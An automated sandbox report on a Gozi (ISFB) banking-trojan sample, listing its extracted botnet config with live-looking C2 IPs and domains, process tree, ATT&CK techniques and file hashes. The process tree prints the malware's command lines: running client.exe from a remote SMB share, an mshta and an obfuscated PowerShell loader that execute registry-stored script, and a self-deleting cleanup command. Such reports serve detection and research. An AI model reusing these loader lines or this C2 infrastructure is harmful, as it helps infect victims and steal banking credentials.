gozi | cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2023 18:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad_JC.url
Size

193B
MD5

b5553dcc74a1f928f6619cff575c0568
SHA1

74d15b6d882d64fc3d21bcc47f9a99685a6705c2
SHA256

cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad
SHA512

439ffa6b0612ba0753a94de5a82d04e7c9fdade17c18a7d204c34260566af162555800260971470af5c79de5b4a15c18609b08da609cff0a4608aff143f5a9d2

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2500 set thread context of 2852	2500	powershell.exe	Explorer.EXE
PID 2852 set thread context of 3752	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 set thread context of 3988	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 set thread context of 4744	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 set thread context of 1552	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 set thread context of 3112	2852	Explorer.EXE	cmd.exe
PID 2852 set thread context of 4992	2852	Explorer.EXE	cmd.exe
PID 3112 set thread context of 2124	3112	cmd.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4256 1456 WerFault.exe client.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2124 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2124 PING.EXE

pid	pid_target	process	target process
4256	1456	WerFault.exe	client.exe

pid	process
2124	PING.EXE

pid	process
2124	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1456	client.exe
1456	client.exe
2500	powershell.exe
2500	powershell.exe
2500	powershell.exe
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2500 powershell.exe
2852 Explorer.EXE
2852 Explorer.EXE
2852 Explorer.EXE
2852 Explorer.EXE
2852 Explorer.EXE
2852 Explorer.EXE
3112 cmd.exe

pid	process
2500	powershell.exe
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
2852	Explorer.EXE
3112	cmd.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

svchost.exepowershell.exeExplorer.EXE

description	pid	process
Token: SeManageVolumePrivilege	3812	svchost.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeShutdownPrivilege	2852	Explorer.EXE
Token: SeCreatePagefilePrivilege	2852	Explorer.EXE
Token: SeShutdownPrivilege	2852	Explorer.EXE
Token: SeCreatePagefilePrivilege	2852	Explorer.EXE
Token: SeShutdownPrivilege	2852	Explorer.EXE
Token: SeCreatePagefilePrivilege	2852	Explorer.EXE
Token: SeShutdownPrivilege	2852	Explorer.EXE
Token: SeCreatePagefilePrivilege	2852	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

2852 Explorer.EXE

pid	process
2852	Explorer.EXE

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3700 wrote to memory of 1456	3700	rundll32.exe	client.exe
PID 3700 wrote to memory of 1456	3700	rundll32.exe	client.exe
PID 3700 wrote to memory of 1456	3700	rundll32.exe	client.exe
PID 2308 wrote to memory of 2500	2308	mshta.exe	powershell.exe
PID 2308 wrote to memory of 2500	2308	mshta.exe	powershell.exe
PID 2500 wrote to memory of 4628	2500	powershell.exe	csc.exe
PID 2500 wrote to memory of 4628	2500	powershell.exe	csc.exe
PID 4628 wrote to memory of 2596	4628	csc.exe	cvtres.exe
PID 4628 wrote to memory of 2596	4628	csc.exe	cvtres.exe
PID 2500 wrote to memory of 2064	2500	powershell.exe	csc.exe
PID 2500 wrote to memory of 2064	2500	powershell.exe	csc.exe
PID 2064 wrote to memory of 4256	2064	csc.exe	cvtres.exe
PID 2064 wrote to memory of 4256	2064	csc.exe	cvtres.exe
PID 2500 wrote to memory of 2852	2500	powershell.exe	Explorer.EXE
PID 2500 wrote to memory of 2852	2500	powershell.exe	Explorer.EXE
PID 2500 wrote to memory of 2852	2500	powershell.exe	Explorer.EXE
PID 2500 wrote to memory of 2852	2500	powershell.exe	Explorer.EXE
PID 2852 wrote to memory of 3752	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3752	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3752	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3752	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3988	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3988	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3988	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3988	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 4744	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 4744	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 4744	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 4744	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 1552	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 1552	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 3112	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 3112	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 3112	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 1552	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 1552	2852	Explorer.EXE	RuntimeBroker.exe
PID 2852 wrote to memory of 4992	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 4992	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 4992	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 4992	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 3112	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 3112	2852	Explorer.EXE	cmd.exe
PID 3112 wrote to memory of 2124	3112	cmd.exe	PING.EXE
PID 3112 wrote to memory of 2124	3112	cmd.exe	PING.EXE
PID 3112 wrote to memory of 2124	3112	cmd.exe	PING.EXE
PID 2852 wrote to memory of 4992	2852	Explorer.EXE	cmd.exe
PID 2852 wrote to memory of 4992	2852	Explorer.EXE	cmd.exe
PID 3112 wrote to memory of 2124	3112	cmd.exe	PING.EXE
PID 3112 wrote to memory of 2124	3112	cmd.exe	PING.EXE

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1552

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4744

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3988

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad_JC.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3700

\??\UNC\62.173.138.114\scarica\client.exe
"\\62.173.138.114\scarica\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 472
3⤵
- Program crash
PID:4256

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>B8io='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(B8io).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vujhempd -value gp; new-alias -name bckoyymx -value iex; bckoyymx ([System.Text.Encoding]::ASCII.GetString((vujhempd "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4628

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6018.tmp" "c:\Users\Admin\AppData\Local\Temp\u1n135mw\CSC1634BC13C5D4BA3AF2FC3CCC86693E.TMP"
5⤵
PID:2596

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60C4.tmp" "c:\Users\Admin\AppData\Local\Temp\cy4dqr2u\CSCE7AC4A548D2D4D9BB49F60E175CDAC0.TMP"
5⤵
PID:4256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.138.114\scarica\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3112

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2124

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4992

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:5060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1456 -ip 1456
1⤵
PID:3436

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
Filesize
16KB

MD5
fc7c615b09ee7901b13d97f0f610a1f7

SHA1
8b975fee6b11ae67884fa698473adb214eb56353

SHA256
ebd3b7f60a89187809584dd25e95d2fe26a4678de40e391a72649c04ddbfadee

SHA512
9eff1f8ac9027aad5f820e7bef639fdb994c1aad84ea3dc3dc9911e51b256ccf95618fd1bb8a9a10ee4840145942e61de7ff9be218e672e6c4cbe91bef60e091

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6018.tmp
Filesize
1KB

MD5
a96a567169381ddd1cc2da5665f8b787

SHA1
abe43536304576d1eec165acc5d34debbb2e89b9

SHA256
af9563bf04fd1d3478714e844d17822f9251999dcbfb8b805258cd5174df6bb6

SHA512
103743c22c53cb4fe4342d085ba17736df933a7839001b94f11c8262fac840966f605f0b48b55d60f22a46b2a36edf27956b932ad360c6c6693c3b8245faef18

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1duymb3b.f3r.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.dll
Filesize
3KB

MD5
d2f93fc78e300ad5cc62e32fd8b05e01

SHA1
35ad7358e312e1d36541440301e026cfc1f3e1a7

SHA256
1288790cbd8d8a357719822f0a5215675885aac2bfa37299fb590136d252b2dd

SHA512
d0df1fcf958cb7ff15ee59ac65f20718fc73d47c4c4bc45ce367ce6fd011db4279c91d7c7c460c995c32b9e864d2550bcebb811e5ee6612a0ac123ced9d1f01b

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.dll
Filesize
3KB

MD5
a89c014afe4691c09082698ffd1c9c53

SHA1
1902eba4caf44d66e8b347d8277bcdb7981ae88a

SHA256
9379d9cfded2f1ab26f97bed0c6e48ef15fb736f1c1f64568d13df533d07ee9e

SHA512
cccbcbf0c0dc72972fadd0ba29b5f4eca1d2ee27b3b5b8e185201149d79595d3774fc2eb90d31550a199a2d19ba9747b2c7705090d85b080bdc32651181061d8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.cmdline
Filesize
369B

MD5
8c865291da7138a9bcc5586c20710b9f

SHA1
5c9c1b381f7f20401ce34923e7c5f1148bc65aa0

SHA256
87d939f2111ffb540de916e9039cedc92c8f23279e0f9097f82c91bf370579ac

SHA512
403b037a86e130c94d6c4c2c9d2689684e88db707e353787ad59aba4b1b02d80159f52db73ba8e4df5410fabd12e02ad7378706df2256aab2a820d174ed3b683

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u1n135mw\CSC1634BC13C5D4BA3AF2FC3CCC86693E.TMP
Filesize
652B

MD5
8e0ab3301096f7be51ef165cc28bcd93

SHA1
fc9591c00845461053416d3693564f9d007a66e6

SHA256
c90dd0978b4a2a90775b5887dfd4f9a0e334372acaaa20a6bf92fc4dc770a6b5

SHA512
724906f3ca05cdab973451ec34b54fd3bdd2b9456115d5413a6f79920ed0f8021a9631f18c8ba141f07c27fb5b9e61ef7b64521fc057998ca46faa21fcae2441

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.cmdline
Filesize
369B

MD5
02a135a4d99fb00534008bda1467746e

SHA1
7bbfeb1e10d888f75ef3cf9da084b06554be14a7

SHA256
319d3a8d4b02c90be16f5e8fef895f4664061a73f495942f5c8b9aeaf9d6785c

SHA512
e772155d9dd51252d0c4659111bca7a4179ac394651f25e33147e74278efd84270cae7e16836c176a8d00dbf12d49d65d29c553fa4442f44ca3f369c4d4f685d

Download Submit
memory/1456-198-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1456-9-0x0000000003FD0000-0x0000000003FDB000-memory.dmp

Filesize
44KB

Download
memory/1456-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp

Filesize
44KB

Download
memory/1456-3-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1456-4-0x0000000004030000-0x000000000403D000-memory.dmp

Filesize
52KB

Download
memory/1456-7-0x00000000024E0000-0x00000000025E0000-memory.dmp

Filesize
1024KB

Download
memory/1456-8-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1456-1-0x00000000024E0000-0x00000000025E0000-memory.dmp

Filesize
1024KB

Download
memory/1552-199-0x000001B4E7F20000-0x000001B4E7FC4000-memory.dmp

Filesize
656KB

Download
memory/1552-172-0x000001B4E7F20000-0x000001B4E7FC4000-memory.dmp

Filesize
656KB

Download
memory/1552-173-0x000001B4E7FD0000-0x000001B4E7FD1000-memory.dmp

Filesize
4KB

Download
memory/2124-189-0x000002468D9D0000-0x000002468D9D1000-memory.dmp

Filesize
4KB

Download
memory/2124-200-0x000002468DC10000-0x000002468DCB4000-memory.dmp

Filesize
656KB

Download
memory/2124-191-0x000002468DC10000-0x000002468DCB4000-memory.dmp

Filesize
656KB

Download
memory/2500-143-0x00007FFFC9700000-0x00007FFFCA1C1000-memory.dmp

Filesize
10.8MB

Download
memory/2500-100-0x00000245EF8A0000-0x00000245EF8B0000-memory.dmp

Filesize
64KB

Download
memory/2500-129-0x00000245EFCC0000-0x00000245EFCFD000-memory.dmp

Filesize
244KB

Download
memory/2500-144-0x00000245EFCC0000-0x00000245EFCFD000-memory.dmp

Filesize
244KB

Download
memory/2500-127-0x00000245EFCB0000-0x00000245EFCB8000-memory.dmp

Filesize
32KB

Download
memory/2500-101-0x00000245EF8A0000-0x00000245EF8B0000-memory.dmp

Filesize
64KB

Download
memory/2500-114-0x00000245EF7F0000-0x00000245EF7F8000-memory.dmp

Filesize
32KB

Download
memory/2500-98-0x00000245EF800000-0x00000245EF822000-memory.dmp

Filesize
136KB

Download
memory/2500-99-0x00007FFFC9700000-0x00007FFFCA1C1000-memory.dmp

Filesize
10.8MB

Download
memory/2852-132-0x00000000009B0000-0x00000000009B1000-memory.dmp

Filesize
4KB

Download
memory/2852-196-0x000000000C280000-0x000000000C324000-memory.dmp

Filesize
656KB

Download
memory/2852-134-0x000000000C280000-0x000000000C324000-memory.dmp

Filesize
656KB

Download
memory/3112-201-0x0000018DFFC30000-0x0000018DFFCD4000-memory.dmp

Filesize
656KB

Download
memory/3112-177-0x0000018DFFCE0000-0x0000018DFFCE1000-memory.dmp

Filesize
4KB

Download
memory/3112-179-0x0000018DFFC30000-0x0000018DFFCD4000-memory.dmp

Filesize
656KB

Download
memory/3752-158-0x000001A7FF500000-0x000001A7FF5A4000-memory.dmp

Filesize
656KB

Download
memory/3752-147-0x000001A7FEEC0000-0x000001A7FEEC1000-memory.dmp

Filesize
4KB

Download
memory/3812-56-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-57-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-83-0x00000207A5FB0000-0x00000207A5FB1000-memory.dmp

Filesize
4KB

Download
memory/3812-82-0x00000207A5FB0000-0x00000207A5FB1000-memory.dmp

Filesize
4KB

Download
memory/3812-80-0x00000207A5FA0000-0x00000207A5FA1000-memory.dmp

Filesize
4KB

Download
memory/3812-68-0x00000207A5DA0000-0x00000207A5DA1000-memory.dmp

Filesize
4KB

Download
memory/3812-65-0x00000207A5E60000-0x00000207A5E61000-memory.dmp

Filesize
4KB

Download
memory/3812-62-0x00000207A5E70000-0x00000207A5E71000-memory.dmp

Filesize
4KB

Download
memory/3812-60-0x00000207A5E60000-0x00000207A5E61000-memory.dmp

Filesize
4KB

Download
memory/3812-59-0x00000207A5E70000-0x00000207A5E71000-memory.dmp

Filesize
4KB

Download
memory/3812-16-0x000002079DB40000-0x000002079DB50000-memory.dmp

Filesize
64KB

Download
memory/3812-32-0x000002079DC40000-0x000002079DC50000-memory.dmp

Filesize
64KB

Download
memory/3812-48-0x00000207A6220000-0x00000207A6221000-memory.dmp

Filesize
4KB

Download
memory/3812-58-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-49-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-84-0x00000207A60C0000-0x00000207A60C1000-memory.dmp

Filesize
4KB

Download
memory/3812-55-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-54-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-53-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-50-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-51-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3812-52-0x00000207A6250000-0x00000207A6251000-memory.dmp

Filesize
4KB

Download
memory/3988-164-0x000001886DF10000-0x000001886DFB4000-memory.dmp

Filesize
656KB

Download
memory/3988-160-0x000001886DCB0000-0x000001886DCB1000-memory.dmp

Filesize
4KB

Download
memory/4744-170-0x00000198D19F0000-0x00000198D1A94000-memory.dmp

Filesize
656KB

Download
memory/4744-167-0x00000198D1AA0000-0x00000198D1AA1000-memory.dmp

Filesize
4KB

Download
memory/4992-185-0x0000000001100000-0x0000000001198000-memory.dmp

Filesize
608KB

Download
memory/4992-194-0x0000000001100000-0x0000000001198000-memory.dmp

Filesize
608KB

Download
memory/4992-183-0x0000000000C40000-0x0000000000C41000-memory.dmp

Filesize
4KB

Download